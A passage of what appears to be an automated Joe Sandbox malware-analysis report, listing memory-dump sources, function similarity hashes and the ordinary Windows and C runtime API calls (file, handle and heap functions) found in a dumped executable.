                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2336955059-0
                                                                                                      • Opcode ID: f15306912a624428dc2e06402d48359535075c36d540457e7ea8984ef4f5c33d
                                                                                                      • Instruction ID: 346d914c4edcbf0b9b81697bc4e38fb4ac2d5811e47658cc8260daac309b03e0
                                                                                                      • Opcode Fuzzy Hash: f15306912a624428dc2e06402d48359535075c36d540457e7ea8984ef4f5c33d
                                                                                                      • Instruction Fuzzy Hash: 2E01D832610119AFCF059F9ADC458AF7B69EB8A724B240345F821BF190EA71ED518790
                                                                                                      APIs
                                                                                                      • MoveFileExW.KERNELBASE(?,00000000,00000002,?,00E9C702,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,?), ref: 00EA703E
                                                                                                      • GetLastError.KERNEL32(?,00E9C702,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00EA7048
                                                                                                      • __dosmaperr.LIBCMT ref: 00EA704F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove__dosmaperr
                                                                                                      • String ID:
                                                                                                      • API String ID: 2142343326-0
                                                                                                      • Opcode ID: b173fccffd319d8e69060978cfaf93a29ff0a6a4e8ce7b62835cb5c6bddaa71e
                                                                                                      • Instruction ID: da38ae173dfc06fea0142c8e4fb67dff0852443706e65bdb0650fcdcd06b6e74
                                                                                                      • Opcode Fuzzy Hash: b173fccffd319d8e69060978cfaf93a29ff0a6a4e8ce7b62835cb5c6bddaa71e
                                                                                                      • Instruction Fuzzy Hash: A8D05232104208BBCF10ABF6EC09A2B3F5CAB86378F108210F52CE80A0EBB2C9109610
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E8C13F: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E8C14B
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E8283B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_taskstd::invalid_argument::invalid_argument
                                                                                                      • String ID: vector<bool> too long
                                                                                                      • API String ID: 740074529-842332957
                                                                                                      • Opcode ID: ee731f98bdb426b14c6697e6516939539261d6a63d461bf1e3cbc119baca99ce
                                                                                                      • Instruction ID: 809ead331d2b7a0918f903e806a16a59a1d351adfaa7126e734494d78466fcfd
                                                                                                      • Opcode Fuzzy Hash: ee731f98bdb426b14c6697e6516939539261d6a63d461bf1e3cbc119baca99ce
                                                                                                      • Instruction Fuzzy Hash: D3519271E0021A8FCF08EFA8C995AAEB7B5FB58314F14556DE61EB7390D7709901CBA0
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E55B62
                                                                                                      Strings
                                                                                                      • MontgomeryRepresentation: Montgomery representation requires an odd modulus, xrefs: 00E55AEF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: MontgomeryRepresentation: Montgomery representation requires an odd modulus
                                                                                                      • API String ID: 2659868963-124676765
                                                                                                      • Opcode ID: 240e329a528f7a46242ca5970fe19f4d1af9059f78dc15347fce8aa3ec21cf4a
                                                                                                      • Instruction ID: 53cdd55662223be41cf370cec0f0a6088518bcf869c2d80b9782a63e49e4c715
                                                                                                      • Opcode Fuzzy Hash: 240e329a528f7a46242ca5970fe19f4d1af9059f78dc15347fce8aa3ec21cf4a
                                                                                                      • Instruction Fuzzy Hash: 6351AE71904A4AEFC701DF99C841B9AFBF8FF54314F10462AE815B7690E7B0A518CB90
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,?,?,,?,?,00000000,?,00EB0A0D,00000000,0000000C), ref: 00EB064F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-624703763
                                                                                                      • Opcode ID: 9b1fcb2c49025ac93017c8b24ca5f28c15d6f89ee28d3d66553c864a11bb6944
                                                                                                      • Instruction ID: 6b1c7312d2117eebcc9924352f71311cfb2d1b3ffe778863f0dd9034343fb17b
                                                                                                      • Opcode Fuzzy Hash: 9b1fcb2c49025ac93017c8b24ca5f28c15d6f89ee28d3d66553c864a11bb6944
                                                                                                      • Instruction Fuzzy Hash: 7DD06C3200010DFFDF029F85DC06EDA3BAAFB48714F014100BA1866020C772E821EB90
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fread_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 2638373210-0
                                                                                                      • Opcode ID: 229831556ba06bf068d9f5df9347cd6957da31035490d43cfd5b54576390d998
                                                                                                      • Instruction ID: 0085786ed7df54f72ff3315fbb588efb149f61234fd3e7b167fd955c0c3d74fa
                                                                                                      • Opcode Fuzzy Hash: 229831556ba06bf068d9f5df9347cd6957da31035490d43cfd5b54576390d998
                                                                                                      • Instruction Fuzzy Hash: C85188366042018FCB18CE2DE884A2EB3E2EFC8324F55966EFD58DB345DA31DC058B91
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000010,00000000,00000000,?,00EA5B25,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA567F
                                                                                                      • GetLastError.KERNEL32(?,00EA5B25,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE4470,00000010,00E9C8E7,00000000,00000000), ref: 00EA56A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: 9ca30c935d163a39f86085e5328288bfb7e24b260ef427f6c0948a83dfbea59b
                                                                                                      • Instruction ID: 38a9510e2ff909dfdef87a6704bf20c6a58cf91fd6524eb04e448b051394bfa3
                                                                                                      • Opcode Fuzzy Hash: 9ca30c935d163a39f86085e5328288bfb7e24b260ef427f6c0948a83dfbea59b
                                                                                                      • Instruction Fuzzy Hash: BA21A2366002199FCB14CF19CC80BEAB3F4EB49315F5044AAE54AE7251D730AD858B50
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00EA3F9E
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00EA3FB0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 35de484aed54bf12ab5a654ce11ecb77cf29ee3ed5544151d07fd918f8ae7755
                                                                                                      • Instruction ID: d46c0899a521f4f5ea08c510d45a1a55b6f7115c5cbbbeb0247de07a18aa2c11
                                                                                                      • Opcode Fuzzy Hash: 35de484aed54bf12ab5a654ce11ecb77cf29ee3ed5544151d07fd918f8ae7755
                                                                                                      • Instruction Fuzzy Hash: 4011A839B287415DC7304A3E8C9C5A2AAB59B5B338B34171AF4B6BE5F1C330FB459241
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 30dee45f665217b27d75fc1a1f7c17545686f403630ed4684e7028ccee88ab05
                                                                                                      • Instruction ID: fcd76ce228c964fa1921e68791ee7602125e71be9ef5f2a653262c2df9bd1a47
                                                                                                      • Opcode Fuzzy Hash: 30dee45f665217b27d75fc1a1f7c17545686f403630ed4684e7028ccee88ab05
                                                                                                      • Instruction Fuzzy Hash: 8D518DB66006048FCB14DF2CE4C0A99B7E5FF49324B2552AAEC19DB39AD731ED44CB90
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E48636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: 1391cc2d05adc47fc085814d7c2b3358e9a13753c47169fffeb12ec2b7f70f40
                                                                                                      • Instruction ID: 10bbe2acbafca7c6b2275d1fcfc396692dd4cacdcdbe26185e0b476a594d3425
                                                                                                      • Opcode Fuzzy Hash: 1391cc2d05adc47fc085814d7c2b3358e9a13753c47169fffeb12ec2b7f70f40
                                                                                                      • Instruction Fuzzy Hash: A841F372A002049FDB28EF7CEA8156EB7E5EB84310F2456BEE45AE7341EB30D9548B54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2ca923b006ffa9a8bcc540b2b9f224931591cd94310e9054c754ba18b3024b27
                                                                                                      • Instruction ID: b5db0e9dda0099e5200d824dda1a55c8192b965b1cc55bca5d5d13d7b123e00d
                                                                                                      • Opcode Fuzzy Hash: 2ca923b006ffa9a8bcc540b2b9f224931591cd94310e9054c754ba18b3024b27
                                                                                                      • Instruction Fuzzy Hash: 9341B7B1A08108AFDB14DF58CC81BA97BE1EB8E364F259168F889BF351D671AD41C760
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E488B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: 16243ef3c026ae7801040d78f313ee230b9adc28ea0a98488ea46b101d4c74e7
                                                                                                      • Instruction ID: 0c176b26a6138000dc7a25034f71e4aa2cd7cab13d8c6318b0600c75c97f0022
                                                                                                      • Opcode Fuzzy Hash: 16243ef3c026ae7801040d78f313ee230b9adc28ea0a98488ea46b101d4c74e7
                                                                                                      • Instruction Fuzzy Hash: 2E312472A002009BD71CEE78AD8556DB7E8EB89320FA4133EE869E73D1DB709D408751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 454dcea81cde766c41ba31f4af47a28be0328637e13ec8451305690ea74c0bb4
                                                                                                      • Instruction ID: 26f354bbf27c7a0525b5808d85eaa6992059c502e4a9579a288c0cd2252a4d62
                                                                                                      • Opcode Fuzzy Hash: 454dcea81cde766c41ba31f4af47a28be0328637e13ec8451305690ea74c0bb4
                                                                                                      • Instruction Fuzzy Hash: 7A012473601216AF9F168F2AEC81A9B33D6ABCA3747254120F905FF5E4DB70E8168780
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __wsopen_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347428461-0
                                                                                                      • Opcode ID: 831cb783b3007eda9f2488d51bcaf3d674919a9d9ef08f2111d3f1067f47184d
                                                                                                      • Instruction ID: 7d5c194664b22c08c05a2395f3ec0b64051dec53fa3dc6695b8ff25cfa195a17
                                                                                                      • Opcode Fuzzy Hash: 831cb783b3007eda9f2488d51bcaf3d674919a9d9ef08f2111d3f1067f47184d
                                                                                                      • Instruction Fuzzy Hash: D111187190410AAFCB15DF58E9419DF7BF5EF49314F104099F808AB312DA31E921CBA5
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3180E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2659868963-0
                                                                                                      • Opcode ID: 6fec12443024993ec87dab6e0e7ca8dac57ba139fdb4b3e43ee525f5566002ca
                                                                                                      • Instruction ID: c5c30370f303c152294cdd9b03bb566bd2b3172cd23d6364c88528ce74a660dd
                                                                                                      • Opcode Fuzzy Hash: 6fec12443024993ec87dab6e0e7ca8dac57ba139fdb4b3e43ee525f5566002ca
                                                                                                      • Instruction Fuzzy Hash: 0601263140430DB7CB14BEA5EC4699A77EC9E02360B50A526FA0CFA591FBB0E990C3D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 617c63332d8cd5fff6c8ea9ab8bdd2ac953f3b3e438d86f20c096a0dff62efe4
                                                                                                      • Instruction ID: 857620bf31f5ec731c90c6bc5d09225895e7cf856630132be5a65f3857d9bde0
                                                                                                      • Opcode Fuzzy Hash: 617c63332d8cd5fff6c8ea9ab8bdd2ac953f3b3e438d86f20c096a0dff62efe4
                                                                                                      • Instruction Fuzzy Hash: 12F0F973502A1456DE313A698E05B5A72D89F53374F242719F860B71E1CF74A90286B2
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 14448e1e65947dbc06f9c561fc5aab0a4ceebeddc3d5721b90f796f7e2f78561
                                                                                                      • Instruction ID: 4551206159b4dc9a26ebe5064ae89363a56d503200dc6de1e30a2f919bbea4f5
                                                                                                      • Opcode Fuzzy Hash: 14448e1e65947dbc06f9c561fc5aab0a4ceebeddc3d5721b90f796f7e2f78561
                                                                                                      • Instruction Fuzzy Hash: 1EF05E3351010DBBEF119E96DC01DEF3BADEFCA334F205155F918A2061DA76EA21A7A1
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
